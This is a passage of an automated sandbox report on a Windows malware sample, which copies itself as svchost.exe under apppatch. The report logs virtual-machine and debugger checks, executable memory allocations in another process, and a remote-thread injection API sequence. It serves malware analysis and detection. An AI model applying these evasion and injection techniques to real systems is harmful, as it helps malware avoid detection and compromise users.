Source: UMwpXhA46R.exe, 00000000.00000002.2153963365.000000000069E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ~windows\system32\vmhgfs.DLL
Source: svchost.exe, 00000002.00000002.3407860513.0000000000826000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hwindows\system32\vmhgfs.DLL
Source: C:\Windows\apppatch\svchost.exe Process information queried: ProcessInformation
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\UMwpXhA46R.exeCode function: 0_2_00401FC0 memset,SHGetFolderPathA,PathAppendA,SetCurrentDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,0_2_00401FC0
Source: C:\Users\user\Desktop\UMwpXhA46R.exeCode function: 0_2_00406800 mov eax, dword ptr fs:[00000030h]0_2_00406800
Source: C:\Users\user\Desktop\UMwpXhA46R.exeCode function: 0_2_00406B60 mov eax, dword ptr fs:[00000030h]0_2_00406B60
Source: C:\Users\user\Desktop\UMwpXhA46R.exeCode function: 0_2_00406B60 mov edx, dword ptr fs:[00000030h]0_2_00406B60
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_00406800 mov eax, dword ptr fs:[00000030h]2_2_00406800
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_00406B60 mov eax, dword ptr fs:[00000030h]2_2_00406B60
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_00406B60 mov edx, dword ptr fs:[00000030h]2_2_00406B60
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_029A1360 mov eax, dword ptr fs:[00000030h]2_2_029A1360
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_029A1360 mov edx, dword ptr fs:[00000030h]2_2_029A1360
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_029A1000 mov eax, dword ptr fs:[00000030h]2_2_029A1000
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_011E1360 mov eax, dword ptr fs:[00000030h]6_2_011E1360
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_011E1360 mov edx, dword ptr fs:[00000030h]6_2_011E1360
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_011E1000 mov eax, dword ptr fs:[00000030h]6_2_011E1000
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_00FE1360 mov eax, dword ptr fs:[00000030h]7_2_00FE1360
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_00FE1360 mov edx, dword ptr fs:[00000030h]7_2_00FE1360
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_00FE1000 mov eax, dword ptr fs:[00000030h]7_2_00FE1000
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_009C1360 mov eax, dword ptr fs:[00000030h]9_2_009C1360
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_009C1360 mov edx, dword ptr fs:[00000030h]9_2_009C1360
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_009C1000 mov eax, dword ptr fs:[00000030h]9_2_009C1000
Source: C:\Users\user\Desktop\UMwpXhA46R.exeCode function: 0_2_004010A0 CreateFileA,GetFileSizeEx,GetProcessHeap,RtlAllocateHeap,memset,ReadFile,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetHandleInformation,CloseHandle,IsBadWritePtr,0_2_004010A0

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 11E0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: FE0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 9C0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 2EA0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 2AF0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 11D0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 2AB0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 24F0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 2E80000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 25F0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 2670000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1550000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: CD0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1540000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1070000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1470000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1220000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 9B0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 600000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: FE0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 940000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: F70000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1570000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 10E0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1220000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1250000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 11B0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: AC0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1400000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 14A0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1020000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1190000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1550000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: A20000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: CB0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 11A0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1340000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1580000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: E10000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: FD0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 880000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: A50000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: DF0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: E90000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 9F0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1460000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 13A0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 15D0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1380000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 620000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1200000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1590000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1440000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: FF0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 10D0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: F60000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: B90000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: D60000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1320000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 600000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: DB0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: A30000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1000000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: F20000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 860000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 9D0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 11D0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 870000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: D70000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 810000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 8D0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: AD0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1210000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1170000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: DB0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1090000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: A00000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 780000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 920000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 860000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 840000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: AC0000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\UMwpXhA46R.exe Code function: 0_2_00401580 IsUserAnAdmin,Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,WriteProcessMemory,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle,0_2_00401580
Source: C:\Windows\apppatch\svchost.exe Code function: 2_2_00401580 IsUserAnAdmin,Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,WriteProcessMemory,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle,2_2_00401580
